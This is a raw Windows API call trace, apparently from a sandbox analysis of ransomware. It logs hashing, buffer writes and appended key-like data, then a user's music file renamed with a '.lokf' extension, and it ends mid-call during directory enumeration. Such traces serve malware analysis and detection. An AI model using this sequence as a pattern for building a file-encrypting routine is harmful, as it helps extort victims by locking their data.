[0060.494] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8698) returned 1 [0060.494] CryptCreateHash (in: hProv=0x6b8698, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0060.494] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0060.494] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0060.494] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0060.494] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0060.494] GetLastError () returned 0x0 [0060.494] CryptDestroyHash (hHash=0x327cb80) returned 1 [0060.495] CryptReleaseContext (hProv=0x6b8698, dwFlags=0x0) returned 1 [0060.495] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0060.495] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0060.495] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0060.495] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.495] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0060.495] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.495] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0060.495] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14c90) returned 0x9c8bae8 [0060.495] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0060.495] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0060.495] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0060.495] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.495] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0060.495] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296380 [0060.495] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c89490 [0060.495] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85e30 [0060.495] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c894d8 [0060.495] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85e48 [0060.495] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85e78 [0060.495] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857d0 [0060.495] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85e90 [0060.496] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0060.496] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0060.496] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0060.496] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0060.496] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85e78 | out: hHeap=0x660000) returned 1 [0060.496] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85e90 | out: hHeap=0x660000) returned 1 [0060.496] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0060.496] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0060.496] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0060.496] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857d0 [0060.496] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f60 [0060.496] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85e90 [0060.496] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0060.496] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c85e78 [0060.496] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f70 [0060.496] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x3234418 [0060.496] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0060.496] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0060.496] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0060.496] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0060.496] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x32425c8 [0060.496] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0060.496] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0060.496] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85e90 | out: hHeap=0x660000) returned 1 [0060.496] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0060.496] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85e78 | out: hHeap=0x660000) returned 1 [0060.496] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0060.496] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0060.496] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0060.496] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0060.496] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296380 | out: hHeap=0x660000) returned 1 [0060.496] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0060.496] GetCurrentThreadId () returned 0x9e0 [0060.496] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f800 [0060.496] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c8ad90 [0060.497] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0060.497] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8698 [0060.497] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0060.497] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0060.497] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0060.497] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f908 [0060.497] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.497] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.497] GetCurrentThreadId () returned 0x9e0 [0060.497] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.497] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.497] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0060.497] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.497] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.497] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.497] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.497] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0060.497] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326fa10 [0060.497] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0060.497] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3261528 [0060.497] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0060.497] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f5f0 [0060.497] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0060.497] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857d0 [0060.497] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0060.497] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0060.497] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0060.497] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0060.497] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0060.497] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0060.497] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0060.497] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0060.497] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85e78 [0060.497] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0060.497] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f20 [0060.498] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0060.498] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0060.498] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f90 [0060.498] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278fa0 [0060.498] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f80 [0060.498] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85e90 [0060.498] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278fa0 | out: hHeap=0x660000) returned 1 [0060.498] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0060.498] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f90 | out: hHeap=0x660000) returned 1 [0060.498] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85e60 [0060.498] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f80 | out: hHeap=0x660000) returned 1 [0060.498] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85770 [0060.498] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0060.498] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f40 [0060.498] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0060.498] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857b8 [0060.498] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0060.498] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857e8 [0060.498] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0060.498] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85ea8 [0060.498] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0060.498] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c857b8 [0060.498] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857e8 | out: hHeap=0x660000) returned 1 [0060.498] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f50 [0060.498] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0060.498] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3240c48 [0060.498] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0060.498] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x328e3b0 [0060.498] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85e78 | out: hHeap=0x660000) returned 1 [0060.498] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85e78 [0060.498] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0060.498] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x204) returned 0x9c711f0 [0060.498] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0060.498] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x3245508 [0060.498] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0060.499] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x210) returned 0x326a370 [0060.499] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0060.499] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10c) returned 0x3234418 [0060.499] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0060.499] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x32453f0 [0060.499] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85e78 | out: hHeap=0x660000) returned 1 [0060.499] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x326a588 [0060.499] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3245508 | out: hHeap=0x660000) returned 1 [0060.499] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f6f8 [0060.499] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0060.499] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8698 | out: hHeap=0x660000) returned 1 [0060.499] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326fa10 | out: hHeap=0x660000) returned 1 [0060.499] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f6f8 | out: hHeap=0x660000) returned 1 [0060.499] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3240c48 | out: hHeap=0x660000) returned 1 [0060.499] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32453f0 | out: hHeap=0x660000) returned 1 [0060.499] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a370 | out: hHeap=0x660000) returned 1 [0060.499] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a588 | out: hHeap=0x660000) returned 1 [0060.499] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0060.499] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0060.499] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85ea8 | out: hHeap=0x660000) returned 1 [0060.499] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0060.499] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0060.499] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0060.499] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85e90 | out: hHeap=0x660000) returned 1 [0060.499] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85e60 | out: hHeap=0x660000) returned 1 [0060.499] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3201228 | out: hHeap=0x660000) returned 1 [0060.499] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257198 | out: hHeap=0x660000) returned 1 [0060.499] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f908 | out: hHeap=0x660000) returned 1 [0060.500] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85e48 | out: hHeap=0x660000) returned 1 [0060.500] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c894d8 | out: hHeap=0x660000) returned 1 [0060.500] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0060.500] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f5f0 | out: hHeap=0x660000) returned 1 [0060.500] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261528 | out: hHeap=0x660000) returned 1 [0060.500] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32452d8 | out: hHeap=0x660000) returned 1 [0060.500] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242688 | out: hHeap=0x660000) returned 1 [0060.500] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0060.500] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0060.500] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32964a0 | out: hHeap=0x660000) returned 1 [0060.500] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0060.500] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0060.500] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32995a0 | out: hHeap=0x660000) returned 1 [0060.500] WriteFile (in: hFile=0x5cc, lpBuffer=0x9c8bae8*, nNumberOfBytesToWrite=0x14c80, lpNumberOfBytesWritten=0x9f4fb14, lpOverlapped=0x0 | out: lpBuffer=0x9c8bae8*, lpNumberOfBytesWritten=0x9f4fb14*=0x14c80, lpOverlapped=0x0) returned 1 [0060.500] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c8bae8 | out: hHeap=0x660000) returned 1 [0060.500] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x14c85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.500] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f800*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f800*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0060.500] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f800 | out: hHeap=0x660000) returned 1 [0060.500] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bba0 [0060.500] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x428) returned 0x326a370 [0060.501] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x326a370, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 41 [0060.501] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x430) returned 0x32947b0 [0060.501] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a370 | out: hHeap=0x660000) returned 1 [0060.501] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bba0 | out: hHeap=0x660000) returned 1 [0060.501] WriteFile (in: hFile=0x5cc, lpBuffer=0x32947b0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x32947b0*, lpNumberOfBytesWritten=0x9f4fb50*=0x28, lpOverlapped=0x0) returned 1 [0060.501] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0060.501] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0060.501] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0060.501] CloseHandle (hObject=0x5cc) returned 1 [0060.502] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262c78 [0060.502] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8b0) returned 0x3268798 [0060.502] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262c78 | out: hHeap=0x660000) returned 1 [0060.502] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\ApuXtGetFJ4Lr9.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m4--j\\icd5mmsptimues\\apuxtgetfj4lr9.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\ApuXtGetFJ4Lr9.wav.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m4--j\\icd5mmsptimues\\apuxtgetfj4lr9.wav.lokf")) returned 1 [0060.503] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.503] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.503] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.504] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228c60 | out: hHeap=0x660000) returned 1 [0060.504] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1318bd70, ftCreationTime.dwHighDateTime=0x1d4cee8, ftLastAccessTime.dwLowDateTime=0x6a5786c0, ftLastAccessTime.dwHighDateTime=0x1d4c998, ftLastWriteTime.dwLowDateTime=0x6a5786c0, ftLastWriteTime.dwHighDateTime=0x1d4c998, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EakifiT9ecot40TbvQP", cAlternateFileName="EAKIFI~1")) returned 1 [0060.504] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262c78 [0060.504] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.504] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x16c) returned 0x9c7a728 [0060.504] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8698 [0060.504] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adb18 [0060.504] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262dc8 [0060.504] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0060.504] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32add78 [0060.504] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adc48 [0060.504] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0060.504] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262e70 [0060.504] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b88b8 [0060.504] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8940 | out: hHeap=0x660000) returned 1 [0060.504] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adea8 | out: hHeap=0x660000) returned 1 [0060.504] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0060.504] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8a50 | out: hHeap=0x660000) returned 1 [0060.504] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adf40 | out: hHeap=0x660000) returned 1 [0060.504] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adfd8 | out: hHeap=0x660000) returned 1 [0060.504] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32ade10 | out: hHeap=0x660000) returned 1 [0060.504] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262d20 | out: hHeap=0x660000) returned 1 [0060.504] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8478 | out: hHeap=0x660000) returned 1 [0060.504] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f4e8 | out: hHeap=0x660000) returned 1 [0060.504] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262d20 [0060.504] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.504] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262c78 | out: hHeap=0x660000) returned 1 [0060.504] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1f10f590, ftCreationTime.dwHighDateTime=0x1d4d459, ftLastAccessTime.dwLowDateTime=0xedf12cb0, ftLastAccessTime.dwHighDateTime=0x1d4ca2a, ftLastWriteTime.dwLowDateTime=0xedf12cb0, ftLastWriteTime.dwHighDateTime=0x1d4ca2a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="JkVomBM7vh9EmuD_aJp", cAlternateFileName="JKVOMB~1")) returned 1 [0060.504] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262c78 [0060.504] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.504] FindNextFileW (in: hFindFile=0x68d798, 